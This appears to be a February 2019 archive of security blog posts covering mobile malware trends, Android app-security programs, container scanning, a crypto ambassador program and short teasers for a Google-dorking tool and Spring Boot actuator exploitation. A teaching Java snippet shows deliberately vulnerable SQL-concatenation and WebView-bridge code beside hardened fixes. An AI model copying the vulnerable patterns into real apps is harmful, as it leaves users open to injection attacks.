Monthly Archives: February 2019

What MWC 2019 Shows Us About the Future of Connectivity

The time has come to say goodbye to Barcelona as we wrap up our time here at Mobile World Congress (MWC). Although it’s hard to believe that the show is already over, MWC 2019 managed to deliver a slew of showstoppers that captured our attention. Here are some of my main takeaways from the event:

Foldable Phones Are the Future

MWC is an opportunity for telecommunications companies, chipmakers, and smartphone firms to show off their latest and greatest innovations, and they sure delivered this year. One particular device that had the show floor buzzing was the Huawei Mate X, a 5G-enabled smartphone that folds out to become an 8-inch tablet. Additionally, Samsung revealed its plans to hold a press event in early April for its foldable smartphone, the Galaxy Fold. Unlike Huawei’s Mate X, the Galaxy Fold bends inward so that it closes like a book. Although neither of these devices is available to the public yet, they’ve definitely made a bold statement when it comes to smartphone design.

Smart Home Technology Goes Mobile

Google is one company taking advantage of smartphone enhancements by putting its Google Assistant into the Android texting app. Assistant for Android Messages allows slices of Google search results to be laid out for users based on their text messages. For example, if one user texted another asking to grab some lunch, a bubble would pop up authorizing Assistant to share suggestions for nearby restaurant locations. While Assistant for Android currently only works for movies and restaurants, we can imagine how this technology could expand to other facets of consumer lives. This addition also demonstrates how AI is slowly but surely making its way onto almost every high-end phone through its apps and other tools.

Enhancing the Gaming Experience with 5G, VR, and AR

Not to be shown up, game developers also made a statement by using 5G technology to bring gamers into a more immersive gaming environment. Mobile game developer Niantic, creator of Pokémon Go and the upcoming Harry Potter: Wizards Unite app, is already working on games that will require a 5G upgrade. One such prototype the company showcased, codenamed Neon, allows multiple people in the same place to play an augmented reality (AR) game at the same time. Each player’s phone shows them the game’s graphics superimposed on the real world and allows the players to shoot each other, duck and dodge, and pick up virtual items, all in real time.

Niantic wasn’t the only one looking to expand the gaming experience with the help of 5G. At the Intel and Nokia booths, Sony set up an Oculus Rift VR game inspired by Marvel and Sony’s upcoming film Spider-Man: Far From Home. Thanks to the low latency and real-time responsiveness of 5G, one player in the Nokia booth was able to race the other player in the Intel booth as if they were swinging through spiderwebs in Manhattan. Players were able to experience how the next generation of wireless technology will allow them to take part in a highly immersive gaming experience.

Bringing 4G and 5G to the Automotive Industry

Gaming isn’t the only industry that’s getting a facelift from 5G. At the show, Qualcomm announced two new additions to its automotive platform: the Qualcomm Snapdragon Automotive 4G and 5G Platforms. One of the main features of these platforms is vehicle-to-everything communication, or C-V2X, which allows a car to communicate with other vehicles on the road, roadside infrastructure, and more. In addition, the platforms offer a high-precision, multi-frequency global navigation satellite system, which will help enable self-driving implementations. The platforms also include features like multi-gigabit cloud connectivity, high-bandwidth, low-latency teleoperations support, and precise positioning for lane-level navigation accuracy. These advancements in connectivity will potentially help future vehicles improve safety, communications, and the overall in-car experience for consumers.

Securing Consumers On-the-Go

The advancements in mobile connectivity have already made a huge impact on consumer lifestyles, especially given the widespread adoption of IoT devices and smart gadgets. But the rise in popularity of these devices has also caught the interest of malicious actors looking to access users’ networks. According to our latest Mobile Threat Report, cybercriminals look to trusted devices to gain access to other devices on the user’s home network. For example, McAfee researchers recently discovered a vulnerability within a Mr. Coffee brand coffee maker that could allow a malicious actor to access the user’s home network. They also uncovered a new vulnerability within BoxLock smart padlocks that could enable cybercriminals to unlock the devices within a matter of seconds.

And while consumers must take the necessary security steps to combat vulnerabilities such as these, we at McAfee are also doing our part to help users everywhere remain secure. For instance, we’ve recently extended our partnerships with both Samsung and Türk Telekom in order to overcome some of these cybersecurity challenges. Together, we’re working to secure consumers from cyberthreats on Samsung Galaxy S10 smartphones and provide McAfee Safe Family protection for Türk Telekom’s fixed and mobile broadband customers.

While the likes of 5G, bendable smartphones, and VR took this year’s tradeshow by storm, it’s important for consumers to keep the cybersecurity implications of these advancements in mind. As the sun sets on our time here in Barcelona, we will keep working to safeguard every aspect of the consumer lifestyle so they can embrace improvements in mobile connectivity with confidence.

To stay on top of McAfee’s MWC news and the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post What MWC 2019 Shows Us About the Future of Connectivity appeared first on McAfee Blogs.

Android Security Improvement update: Helping developers harden their apps, one thwarted vulnerability at a time

Posted by Patrick Mutchler and Meghan Kelly, Android Security & Privacy Team

[Cross-posted from the Android Developers Blog]

Helping Android app developers build secure apps, free of known vulnerabilities, means helping the overall ecosystem thrive. This is why we launched the Application Security Improvement Program five years ago, and why we're still so invested in its success today.

What the Android Security Improvement Program does

When an app is submitted to the Google Play store, we scan it to determine if a variety of vulnerabilities are present. If we find something concerning, we flag it to the developer and then help them to remedy the situation.

Think of it like a routine physical. If there are no problems, the app runs through our normal tests and continues on the process to being published in the Play Store. If there is a problem, however, we provide a diagnosis and next steps to get back to healthy form.

Over its lifetime, the program has helped more than 300,000 developers to fix more than 1,000,000 apps on Google Play. In 2018 alone, the program helped over 30,000 developers fix over 75,000 apps. The downstream effect means that those 75,000 vulnerable apps are not distributed to users with the same security issues present, which we consider a win.

What vulnerabilities are covered

The App Security Improvement program covers a broad range of security issues in Android apps. These can be as specific as security issues in certain versions of popular libraries (e.g., CVE-2015-5256) and as broad as unsafe TLS/SSL certificate validation.

We are continuously improving this program's capabilities by refining the existing checks and launching checks for more classes of security vulnerability. In 2018, we deployed warnings for six additional classes of security vulnerability:

  1. SQL Injection
  2. File-based Cross-Site Scripting
  3. Cross-App Scripting
  4. Leaked Third-Party Credentials
  5. Scheme Hijacking
  6. JavaScript Interface Injection
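Two of the classes listed above are easiest to understand side by side with their fixes. The following Android snippet is an added example written for this page; it is not code from the Android Security Improvement Program or from Google. The class name `AppSecExamples`, the `notes` table, the `Bridge` object and the trusted-host check are all assumptions made for illustration. It shows SQL injection (class 1) through `SQLiteDatabase.rawQuery` built by string concatenation, and JavaScript interface injection (class 6) through a `WebView` that exposes an `addJavascriptInterface` bridge to every page it loads; each vulnerable method is followed by a hardened one.

```java
import android.database.Cursor;
import android.database.sqlite.SQLiteDatabase;
import android.net.Uri;
import android.webkit.JavascriptInterface;
import android.webkit.WebResourceRequest;
import android.webkit.WebView;
import android.webkit.WebViewClient;

// Hypothetical helper class; names and the "notes" table are assumptions for this example.
public final class AppSecExamples {

    // --- 1. SQL Injection ---

    // VULNERABLE: the untrusted value is spliced into the SQL text. A quote character in
    // the value ends the string literal, and whatever follows is parsed as SQL.
    public static Cursor findNotesVulnerable(SQLiteDatabase db, String owner) {
        String sql = "SELECT id, body FROM notes WHERE owner = '" + owner + "'";
        return db.rawQuery(sql, null);
    }

    // HARDENED: the value is passed as a bound parameter ('?'); SQLite treats it purely
    // as data, so quotes inside it cannot change the statement's structure.
    public static Cursor findNotesSafe(SQLiteDatabase db, String owner) {
        return db.rawQuery("SELECT id, body FROM notes WHERE owner = ?",
                new String[] { owner });
    }

    // --- 6. JavaScript Interface Injection ---

    // Object exposed to page JavaScript. On API 17+ only methods annotated with
    // @JavascriptInterface are callable from the page; everything else stays hidden.
    public static final class Bridge {
        @JavascriptInterface
        public String appVersion() { return "1.0"; }
    }

    // VULNERABLE: the bridge is reachable from every page this WebView loads, including
    // third-party or plain-HTTP content, so any script running on such a page can call it.
    public static void setupVulnerable(WebView webView, String url) {
        webView.getSettings().setJavaScriptEnabled(true);
        webView.addJavascriptInterface(new Bridge(), "Android");
        webView.loadUrl(url);
    }

    // HARDENED: top-level navigation is restricted to the app's own HTTPS host, so the
    // bridge is only ever exposed to pages from that origin.
    public static void setupSafe(WebView webView, final String trustedHost) {
        webView.getSettings().setJavaScriptEnabled(true);
        webView.setWebViewClient(new WebViewClient() {
            @Override
            public boolean shouldOverrideUrlLoading(WebView view, WebResourceRequest request) {
                // Returning true cancels the load; anything off the trusted host is refused.
                return !isTrusted(request.getUrl(), trustedHost);
            }
        });
        webView.addJavascriptInterface(new Bridge(), "Android");
        webView.loadUrl("https://" + trustedHost + "/");
    }

    // Origin check used above: exact host match, HTTPS only (no downgrade to http://).
    static boolean isTrusted(Uri uri, String trustedHost) {
        return "https".equals(uri.getScheme()) && trustedHost.equals(uri.getHost());
    }
}
```

The `shouldOverrideUrlLoading` callback only sees top-level navigations, so a complete hardening of the WebView case also keeps the bridge's surface minimal (expose no method that reads files or app data) and, where the app can avoid it, does not call `addJavascriptInterface` at all.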

Ensuring that we're continuing to evolve the program as new exploits emerge is a top priority for us. We are continuing to work on this throughout 2019.

Keeping Android users safe is important to Google. We know that app security is often tricky and that developers can make mistakes. We hope to see this program grow in the years to come, helping developers worldwide build apps users can truly trust.

Mobile Threat Report Commentary: Mobile Malware is Not Going Away

Employees use their mobile devices to be proactive and stay connected in both their personal and work lives. The movement to the cloud has allowed employees to check email, download documents, and share data that may be sensitive, even when they’re not on an enterprise network. Businesses must protect their enterprise environments and combat threats that target their employees as ordinary consumers.

McAfee research shows that every mobile-enabled device is subject to some type of malicious exploit. In 2018, McAfee researchers discovered mobile malware named TimpDoor, which turned Android devices into hidden proxies. But in 2019, businesses should be prepared for malware that goes beyond mobile devices too.

Detections of backdoors, cryptomining, fake apps, and banking Trojans all increased substantially in the second half of 2018, and attacks on other connected household devices gained momentum as well. While hidden apps such as adware remain by far the most common form of mobile malware, other families are growing and learning how to infect other devices.

Mobile devices are becoming a hub for ransomware and malware developers. One common thread through much of the mobile attack landscape is the quest for illicit profits. Criminals are looking for ways to maximize their income and shift tactics in response to changes in the market.

“75% rise in banking Trojans, enabling cybercriminals to steal financial credentials from mobile devices”

“550% increase in mobile malware realized by the end of 2018”

Weak to non-existent security controls from manufacturers, combined with users skipping simple protective measures such as changing the default username and password, make connected devices in the home and workplace targets for cybercriminals.

Although mobile devices have become key enablers for business productivity and connectivity, they’re still the greatest risk to enterprises today. This changes how enterprises need to secure the mobile devices that connect to their environment. Enterprises must invest in endpoint security solutions to protect themselves from the evolving threat landscape. Mobile is one of the fastest growing endpoints and needs to be protected just as much as laptops and desktop computers.

McAfee has addressed the growing need by introducing the MVISION portfolio, which gives IT administrators insight and control through a single management console. McAfee MVISION Mobile provides on-device detection, local (end-user) threat remediation, visual mapping of nearby dangerous networks, customizable on-device user notifications, and advanced threat detection. This provides the enterprise-class threat defense that businesses today need to be secure.

Read the McAfee Mobile Threat Report to learn more about protecting your employees’ mobile devices from malware and other cyberthreats.

The post Mobile Threat Report Commentary: Mobile Malware is Not Going Away appeared first on McAfee Blogs.

How Veracode Scans Docker Containers for Open Source Vulnerabilities

Veracode Container Security Scanning

Veracode Software Composition Analysis now also scans Docker containers and images to find vulnerabilities associated with open source libraries as dependencies of the base OS image and globally installed packages. If you’re interested in understanding how containers work, the different components that make up your container ecosystem, and how that differs from virtualization, we recommend this great overview by Docker.

Do containers introduce new risks?

Containers can introduce new risks to your application due to the installation of a base OS image that you may not have used without the container, but they can also give you greater access and knowledge earlier in the development process. The image itself will often depend on numerous open source libraries that can introduce new vulnerabilities to your application. In addition, containers allow you to install packages at the global level, which previously may not have been accessible to vulnerability scans. It’s also not uncommon for developers to build applications in different environments than what is in production, meaning any vulnerability scans in development may not mirror what is in production. By containerizing applications, developers are able to build in the same environment as the final production platform, allowing them to conduct vulnerability scans on a production-ready image.

Simply using containers isn’t the security risk – it’s not knowing which open source libraries are installed and the vulnerabilities they may present.

How does Veracode secure containers?

Securing your container infrastructure is a huge undertaking that isn’t always clearly defined. Every layer of the container infrastructure can introduce risks, including the hardware, host OS, kernel, Docker engine, registry, base OS image, globally installed packages, and the application. Look to your existing set of vendors and solutions to address each one of them in the same way that you’re addressing OS vulnerabilities on the rest of the network.

As an application security company, Veracode is focused on the application, the base OS image, and the globally installed packages.

Securing containers from open source vulnerabilities isn’t all that different from looking at vulnerabilities in open source libraries in your code. You need to be able to scan your container the moment it’s introduced, with all of its globally installed packages. This enables your development team to decide whether they want to proceed forward with the vulnerabilities present, introduce ways to mitigate the issues, update to a more secure version of the libraries being used, or explore alternative base images and libraries that are more secure.

Divide and conquer: vulnerabilities in application code vs. base OS image

To limit complexity, and to avoid waiting for all applications to be “Dockerized,” Veracode recommends that you divide and conquer the security of the application itself and the security of the container and its dependencies:

  1. Scan your code before you package it up in a container – fix all of the third-party vulnerabilities, and the flaws found in your first-party code.
  2. Once your application/code is in a state that is acceptable for production, containerize the application in your pipeline, and then run an open source security scan against the container itself.

Veracode Software Composition Analysis finds vulnerabilities in the base OS image and runtime dependencies

Veracode Software Composition Analysis now looks for vulnerabilities associated with open source libraries as dependencies of the base OS image (CentOS/RHEL) and any packages globally installed with the YUM package manager in a Docker container.

Containers are scanned automatically via an agent in the developer’s CI system, or manually in a developer’s CLI. You can scan your application prior to the containerization and the container itself separately. This provides a clear inventory of all of the dependencies and associated vulnerabilities before pushing it to production.

Finally, Veracode Software Composition Analysis keeps a history of what’s in the container and alerts you to new vulnerabilities, removing the requirement of rescanning the container unless you change its dependencies.

To learn more about open source libraries, and direct vs. indirect dependencies, read the Understanding Your Open Source Risk ebook.

The ’80s called... they want their on-premises solution back!

Are you still breakdancing? Storing data on your floppy disk? Performing your searches through the card catalog? Assuming the answer is no, then why are you still using an on-premises application security solution?

In all seriousness, take a look at the benefits, and cost savings, you would see with a cloud-based AppSec solution:

Start scanning immediately: No need to install servers and tools, no need to hire consultants or security specialists to get up and running. On-premises solutions require significant upfront implementation and equipment costs. In addition, on-premises solutions typically require specialized experts to install and run. The security experts who can install, configure, and maintain these tools, as well as respond to the information they return, are expensive and in short supply.

Easily accommodate large and distributed teams: In today’s environment, teams are rarely in one location. With cloud solutions, disparate teams can work seamlessly together.

Simpler to scale: When an on-premises application security program needs to be scaled, enterprises frequently need to track down more of these hard-to-find security specialists, in addition to installing more servers.

Continuously learning and improving: Unlike an on-premises AppSec solution, a cloud-based solution is continuously gathering more information, learning, and improving. With this feature, it’s less likely that developers will get bogged down with false positives because the platform is continuously learning to adapt to evolving threats.

Mobile access: Mobile access is available with a cloud solution, but not always with an on-premises solution.

As progressive organizations seek the best possible solution for addressing the challenge of application security, they’re looking for speed, scale, and simplicity. These are exactly where on-premises software falls short. So why are some companies still holding on to a thing of the past?

In conclusion, let’s keep the ’80s where they belong, back in the ’80s (except for some of the music; some of the music is worth keeping).

Need more convincing? Check out some of the related content below.

Related Content:

The Ultimate Guide to Getting Started With Application Security

Infosheet: Spotting Hidden Costs: Veracode vs. On-Premises Tools

Guide: Cloud vs. On-Premises Guide

McAfee Partners With Telefónica To Help Secure Consumers Worldwide

These days, cyberattacks can feel relentless. Due to the interconnected nature of the world we live in, cybercriminals have managed to infiltrate our personal devices, our networks, and even our homes. That’s why we at McAfee believe it’s important now more than ever to secure every facet of the modern consumer lifestyle. And we’ve partnered with Telefónica to do just that.

This partnership first began back in February of last year, when ElevenPaths, Telefónica’s Cyber Security Unit, and McAfee announced that we were working together to reinforce the online security of Telefónica’s broadband and mobile customers across multiple markets. This partnership covers Europe and Latin America, with plans to progressively roll out solutions in the different countries where Telefónica operates. It’s the first time a telecommunications company has delivered a security service to all of its customers, regardless of where they connect from.

Fast forward to the present day, and this partnership has only expanded. The global product developed by Telefónica and powered by McAfee was first launched in Spain as Movistar Conexión Segura, a service that protects home and mobile customers’ connectivity. Telefónica protects Fusión customers’ home connections with a smart router, thanks to the ElevenPaths solution powered by McAfee Secure Home Platform, which enables seamless security and easy activation. Conexión Segura is also available for Movistar mobile customers, including network protection and one license of Seguridad Dispositivo, a multi-device security protection. Only a few weeks after Spain, Movistar Argentina launched the solution for its fixed and mobile customers. These services help realize Telefónica’s “Security by Default” strategy, offering customers a more robust security solution that protects against threats like viruses, malware, phishing, and emerging IoT threats.

Telefónica and McAfee’s 360 partnership is dedicated to protecting the productivity of consumers everywhere. “This agreement gives customers current and contextual information on their cybersecurity status so they can stay connected with confidence,” said Pedro Pablo Pérez, Global Security VP of Telefónica and CEO of ElevenPaths, Telefónica Cybersecurity Unit.

ElevenPaths and McAfee’s joint vision to create a more secure tomorrow brings us a step closer to stopping widespread cyberattacks. By joining forces to implement more robust security solutions around the world, we can ensure that our connectivity goes undisrupted. Because together is power.

To learn more about consumer security and our approach to it, be sure to follow us at @ElevenPaths and @McAfee.

The post McAfee Partners With Telefónica To Help Secure Consumers Worldwide appeared first on McAfee Blogs.

In 2019 the Threat is “Everywhere Malware”, Not just Mobile Malware

This time last year, we said that 2018 would be the year of mobile malware.

Today at MWC, we’re calling 2019 the year of everywhere malware.

In their quest for profit, criminals are constantly forced to shift their tactics and adapt to a changing mobile market. Take crypto-mining, for example. A year ago this was a relatively hassle-free way of making money. But the bottom dropped out of the crypto-currency market over the course of 2018. Now it’s not as lucrative, so we witness more aggressive forms of ransomware that make payment more likely.

Our latest Mobile Threat Report has revealed a huge increase in backdoors, fake apps and banking Trojans. Hidden apps are being exploited as quickly as app stores can take them down and adversaries are adapting and developing new threats. The number of attacks on other connected things is growing too – your voice assistant might even be letting criminals into your home. And smartphones, of course, remain a prime target.

In particular, the use of banking Trojans to steal financial credentials has exploded. Their popularity is growing so fast that we saw the number of incidents double between June and September last year. They then spiked by a further 75 percent in December. Android users in particular are being targeted, as malware authors find new ways of bypassing Google’s security. Unfortunately for consumers, these Trojans represent a solid source of income for cybercriminals so, for the foreseeable future at least, we can expect them to continue to evolve and become more sophisticated.

A worrying new trend sees attacks extending beyond mobile apps and operating systems and into our homes. Smart home tech is becoming integral to our domestic lifestyle – there are already over 25 million voice assistants such as Google Home and Alexa in our homes, and this is expected to grow to as many as 275 million within the next five years. Add to this a growing number of connected thermostats, locks and doorbells, and this represents a huge – and hugely attractive – attack vector for cybercriminals. The quirks and vulnerabilities of these devices, coupled with weak to non-existent security controls could provide unfettered access to the rest of your home network.

At the heart of all of this, of course, lies the smartphone. The control hub and gateway to the voice assistants and smart devices we engage with on a day-to-day basis, these devices track where we are, what we’re doing, and often hold important personal information. Access to our smartphones is clearly worth its weight in gold to criminals. After all, from here they steal our bank details and even make their way into our homes. And with new malware families especially designed to trick smartphone users into giving them access, that’s just what they’re trying to do.

The mobile ecosystem is continually changing. Operators and developers can get wise to the tactics used by criminals, but criminals will never give up in their pursuit of profit. If one door closes on them, they’ll just open another one. They’ll change their tactics and broaden their efforts to target more aspects of our increasingly ubiquitous mobile use.

That’s why the entire tech industry, from smart device and mobile device manufacturers to developers and app store owners, must work more closely together. Only then will we be able to tackle this insidious threat and protect consumers at every point of their increasingly digital lives.

To find out more, see our latest Mobile Threat Report here.

The post In 2019 the Threat is “Everywhere Malware”, Not just Mobile Malware appeared first on McAfee Blogs.

Connect with NICE at RSA Conference 2019

The NICE Program Office will be participating in the RSA Conference next week in San Francisco, California. See below for ways you can connect with us. We hope to see you there!

Google Play Protect in 2018: New updates to keep Android users secure

Posted by Rahul Mishra and Tom Watkins, Android Security & Privacy Team

[Cross-posted from the Android Developers Blog]

In 2018, Google Play Protect made Android devices running Google Play some of the most secure smartphones available, scanning over 50 billion apps every day for harmful behaviour.

Android devices can genuinely improve people's lives through our accessibility features, Google Assistant, digital wellbeing, Family Link, and more — but we can only do this if they are safe and secure enough to earn users' long-term trust. This is Google Play Protect's charter and we're encouraged by this past year's advancements.

Google Play Protect, a refresher

Google Play Protect is the technology we use to ensure that any device shipping with the Google Play Store is secured against potentially harmful applications (PHA). It is made up of a giant backend scanning engine to aid our analysts in sourcing and vetting applications made available on the Play Store, and built-in protection that scans apps on users' devices, immobilizing PHA and warning users.
This technology protects over 2 billion devices in the Android ecosystem every day.

What's new

On by default
We strongly believe that security should be a built-in feature of every device, not something a user needs to find and enable. When security features function at their best, most users do not need to be aware of them. To this end, we are pleased to announce that Google Play Protect is now enabled by default to secure all new devices, right out of the box. The user is notified that Google Play Protect is running, and has the option to turn it off whenever desired.

New and rare apps
Android is deployed in many diverse ways across many different users. We know that the ecosystem would not be as powerful and vibrant as it is today without an equally diverse array of apps to choose from. But installing new apps, especially from unknown sources, can carry risk.
Last year we launched a new feature that notifies users when they are installing apps that are new or rarely installed in the ecosystem. In these scenarios, the feature shows a warning, giving users pause to consider whether they want to trust this app, and advising them to take additional care and check the source of installation. Once Google has fully analyzed the app and determined that it is not harmful, the notification will no longer display. In 2018, this warning showed around 100,000 times per day.

Context is everything: warning users on launch

It's easy to misunderstand alerts when presented out of context. We're trained to click through notifications without reading them and get back to what we were doing as quickly as possible. We know that providing timely and context-sensitive alerts to users is critical for them to be of value. We recently enabled a security feature first introduced in Android Oreo which warns users when they are about to launch a potentially harmful app on their device.

This new warning dialog provides in-context information about which app the user is about to launch, why we think it may be harmful and what might happen if they open the app. We also provide clear guidance on what to do next. These in-context dialogs ensure users are protected even if they accidentally missed an alert.

Auto-disabling apps

Google Play Protect has long been able to disable the most harmful categories of apps on users' devices automatically, providing robust protection where we believe harm will be done.

In 2018, we extended this coverage to apps installed from Play that were later found to have violated Google Play's policies, e.g. on privacy, deceptive behavior or content. These apps have been suspended and removed from the Google Play Store.

This does not remove the app from the user's device, but it does notify the user and prevents them from opening the app accidentally. The notification gives the option to remove the app entirely.

Keeping the Android ecosystem secure is no easy task, but we firmly believe that Google Play Protect is an important security layer that's used to protect users' devices and their data while maintaining the freedom, diversity and openness that makes Android, well, Android.
Acknowledgements: This post leveraged contributions from Meghan Kelly and William Luh.

Request for Comments: PCI SPoC MSR Annex

From 26 Feb to 26 March, PCI SSC stakeholders can participate in a Request for Comments (RFC) on the draft PCI SPoC Magnetic Stripe Reader (MSR) Annex. RFC periods are avenues for PCI SSC stakeholders to provide feedback on existing and new PCI Security Standards. This feedback plays a critical role in the ongoing maintenance and development of these resources for the payment card industry.

How To: Become An Official Cloudbric Ambassador

Cloudbric is pleased to announce our Official Cloudbric Ambassador Program!

Maybe you’re new to the community or perhaps you were unable to participate in our airdrops and bounty programs previously — whatever the case may be, now is your chance to earn rewards with us.

Participating in the Official Cloudbric Ambassador Program is easy:

Cloudbric Ambassador infographic
How to Participate

✔ Step 1: Follow us on social media and get verified by our team

Subscribe to Cloudbric’s main social media channels (i.e. Reddit, Telegram Community, Facebook, LinkedIn, and Twitter). Let us know your handle in each of our community channels for verification here. Individuals can check their approval status here.

By joining the program, you are agreeing to subscribe to our newsletter. Opting out may disqualify you from the program. Please make sure your email is valid and that you have not accidentally marked incoming emails from ico@cloudbric.com or marketing@cloudbric.com as spam.

✔ Step 2: Participate in discussions

This is the most important step in getting rewards! Please provide insightful questions, comments, help for other users, etc. that lead to additional sharing/discussion (comments or posts in our communities do not have to be directly Cloudbric related, but must be relevant within the cybersecurity or blockchain space). Submit your social activities through a separate submissions form.

✔ Step 3: Receive rewards

If your posts or comments receive additional shares or follow up comments, you are eligible to receive prizes and giveaways including CLB airdrops, Starbucks/Amazon gift cards, free WAF servicing, and more.

Referrals – You can also invite friends to join our channels. They MUST satisfy the same requirements (Steps 1-3) for you to potentially receive double the rewards (2x CLB airdrops, larger gift card giveaways, longer WAF servicing, etc.). Referrals can be added through the same Google Form.

Guidelines & Rules

To avoid disqualification from the program, please read through the guidelines and rules carefully.

Users who have submitted their social media handles and have been verified/approved can begin their duties as an Official Cloudbric Ambassador.

Engagements will be treated equally across the different social media platforms (i.e. Reddit, Telegram Community, Facebook, LinkedIn, and Twitter). So, if you don’t have a Twitter account for example, you’re not at a disadvantage!

We reserve the right to remove anyone from the campaign at any time from suspected dishonesty or spamming.

Anyone discussing issues regarding race, gender, politics, or other irrelevant topics can be permanently banned from the campaign.

Guidelines are subject to change at any time.

Submissions:

Users are not limited in the number of engagements per week; however, users will be asked to submit the URLs of their social activities. You can submit up to five social activities per week. If you submit more than five, only five will be reviewed by our team. If you’re submitting for Telegram, please submit your Telegram username in lieu of a URL.

Posts should avoid using generic tones (e.g. “well done,” “nice work,” “great project,” “to the moon,” etc.) or copied-and-pasted material from our whitepaper, website, or other resources. Only engaging content will be reviewed, and only legitimate comments/questions/referrals will be eligible for rewards.

If you’ve made a follow-up comment, post the URL of the original post.

Reviews:

To give participants ample time to receive follow up discussion/comments to their posts, reviews will occur after two weeks of first posting.

Distribution:

Users will receive their awards on a bi-quarterly (twice per quarter) basis, depending on the number of overall participants.

Grading System & Awards

Winners may be eligible to receive the following awards: CLB, Gift Cards (Amazon/Starbucks), WAF Servicing. Awards are subject to change and we may choose to add higher stake awards.

Social activities or referrals will be assigned a point value:

Type A: Original posts = 1 pt

    • Relevant, organic posts/questions

Type B: Engaged posts = 3 pts

    • Shares, followup comments on Type A posts

Referrals = 10 pts

Once the required points are reached, participants can choose awards from the following list:

80 pts – 8,000 CLB
80 pts – $25 gift card
80 pts – 3 months free of Cloudbric service, up to 100GB
160 pts – 16,000 CLB
160 pts – $50 gift card
160 pts – 6 months free of Cloudbric service, up to 100GB

FAQ

1) How long will it take for my social media handles to get approved by the Cloudbric team?

Please allow for up to 3 business days. If you don’t hear back within 3 business days please email us at ico@cloudbric.com.

2) How do I submit proof of my social activities?

Follow this Google Form and follow the instructions. 

3) Can I choose which prize to receive?

Yes, as long as the required points are met. We will ask participants to choose a reward of their choice.

4) How do you redeem prizes?

As specified in the guidelines, users will receive their awards on a bi-quarterly (twice per quarter) basis, depending on the number of overall participants. Cloudbric will request further information (for example, recipient email address for gift cards, ETH address for receiving CLB) if needed.

5) Is there a limit on the number of referrals?

There is no limit at the moment, but rules and other guidelines are subject to change. Please note that simply adding referrals does not guarantee you the specified points. Referrals must fulfill Steps 1-3 and therefore must participate in discussions to be eligible for rewards.

6) Until when will the Cloudbric Ambassador Program run? 

The Cloudbric Ambassador Program will run until the end of the year!

The post How To: Become An Official Cloudbric Ambassador appeared first on Cloudbric.

Open Backdoors and Voice Assistant Attacks: Key Takeaways from the 2019 Mobile Threat Report

These days, we seem to have a newfound reliance on all things ‘smart.’ We give these devices the keys to our digital lives, entrusting them with tons of personal information. In fact, we are so eager to adopt this technology that we connect 4,800 devices per minute to the internet with no sign of slowing down. This is largely because smart devices make our lives easier and more enjoyable. But even though these devices are convenient, it’s important to understand they’re also convenient for cybercriminals, given they contain a treasure trove of personal data. To examine how exactly these hackers plan on capturing that data, we at McAfee have taken a deep dive into the mobile threat landscape in this year’s Mobile Threat Report. In this report, we examine some of the most significant threat trends, including new spyware, mobile malware, and IoT attack surfaces. Let’s take a look at these trends and how you can keep all your devices protected.

Operations RedDawn and FoulGoal

In our 2018 report, we predicted that attacks targeted toward mobile devices would increase, and everything from fake Fortnite apps to increased mobile malware has proven this to be true. However, two recent discoveries, Operation RedDawn and FoulGoal, prove just how targeted these attacks can really get. RedDawn, in particular, has set its sights on North Korean refugees, as the spyware attempts to copy photos, contacts, SMS messages, and other personal data belonging to the victim.

The latter attack, FoulGoal, actually occurred during last year’s World Cup, as the campaign used an app called Golden Cup to install spyware on victims’ devices. This app promised users live streams of games from the Russian 2018 FIFA World Cup, as well as a searchable database of previous World Cup records. In addition to stealing the user’s phone number, device details, and installed packages, FoulGoal also downloaded spyware to expand its infection into SMS messages, contacts, GPS details, and audio recordings.

A Virtual Backdoor

Our smartphones are now like remote controls for our smart homes, controlling everything from lights to locks to kitchen appliances. So, it was only a matter of time before cybercriminals looked for ways to trick users into leaving open a virtual backdoor. Enter TimpDoor, an Android-based malware family that does just that. First appearing in March 2018, it quickly became the leading mobile backdoor family, as it runs a SMiShing campaign that tricks users into downloading fake voice-messaging apps.

These virtual backdoors are now an ever-growing threat as hackers begin to take advantage of the always-connected nature of mobile phones and other connected devices. Once distributed as Trojanized apps through app stores, like Google Play, these backdoors can come disguised as add-on games or customization tools. And while most are removed fairly quickly from app stores, hackers can still pivot their distribution efforts and leverage popular websites to conceive a socially engineered attack to trick users into enabling unknown sources.

The Voice Heard Around the Home

Around the world, there are already over 25 million voice assistants, or smart speakers, in use. From simple queries to controlling other IoT gadgets throughout the home, these devices play a big role in our living environments. But many of these IoT devices fail to pass even the most basic security practices, and have easily guessable passwords, notable buffer overflow issues, and unpatched vulnerabilities. This makes voice assistants an increasingly valuable and potentially profitable attack vector for cybercrime.

For a typical voice assistant in the home, the attack surface is quite broad. Cybercriminals could gain access to the microphone or listening stream, and then monitor everything said. Additionally, they could command the speakers to perform actions via other speaker devices, such as embedding commands in a TV program or internet video. Crooks could even alter customized actions to somehow aid their malicious schemes. However, some of the most pressing vulnerabilities can come from associated IoT devices, such as smart plugs, door locks, cameras, or connected appliances, which can have their own flaws and could provide unrestrained access to the rest of the home network.

The good news? We at McAfee are working tirelessly to evolve our home and mobile solutions to keep you protected from any current and future threats. Plus, there are quite a few steps you can personally take to secure your devices. Start by following these tips:

  • Delete apps at the first sign of suspicious activity. If an app requests access to anything outside of its service, or didn’t originate from a trusted source, remove it immediately from your device.
  • Protect your devices by protecting your home network. While we continue to embrace the idea of “smart homes” and connected devices, we also need to embrace the idea that with great connectivity, comes great responsibility to secure those connections. Consider built-in network security, which can automatically secure your connected devices at the router-level.
  • Keep your security software up-to-date. Whether it’s an antivirus solution or a comprehensive security suite, always keep your security solutions up-to-date. Software and firmware patches are ever-evolving and are made to combat newly discovered threats, so be sure to update every time you’re prompted to. Better yet, flip on automatic updates.
  • Change your device’s factory security settings. When it comes to products, many manufacturers don’t think “security first.” That means your device can be potentially vulnerable as soon as you open the box. By changing the factory settings you’re instantly upping your smart device’s security.

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

The post Open Backdoors and Voice Assistant Attacks: Key Takeaways from the 2019 Mobile Threat Report appeared first on McAfee Blogs.

DorkMe – Google Dorks Tool Search For Vulnerabilities

DorkMe is a tool designed to make it easier to search for vulnerabilities with Google Dorks, such as SQL Injection vulnerabilities.

Dependencies: pip install -r requirements.txt

It is highly recommended to add more dorks for an effective search; keep reading to see how.

Usage […]

The post DorkMe – Google Dorks Tool Search For Vulnerabilities appeared first on HackingVision.

Exploiting Spring Boot Actuators

This post was updated May 1, 2019

The Spring Boot Framework includes a number of features called actuators to help you monitor and manage your web application when you push it to production. Intended to be used for auditing, health, and metrics gathering, they can also open a hidden door to your server when misconfigured.

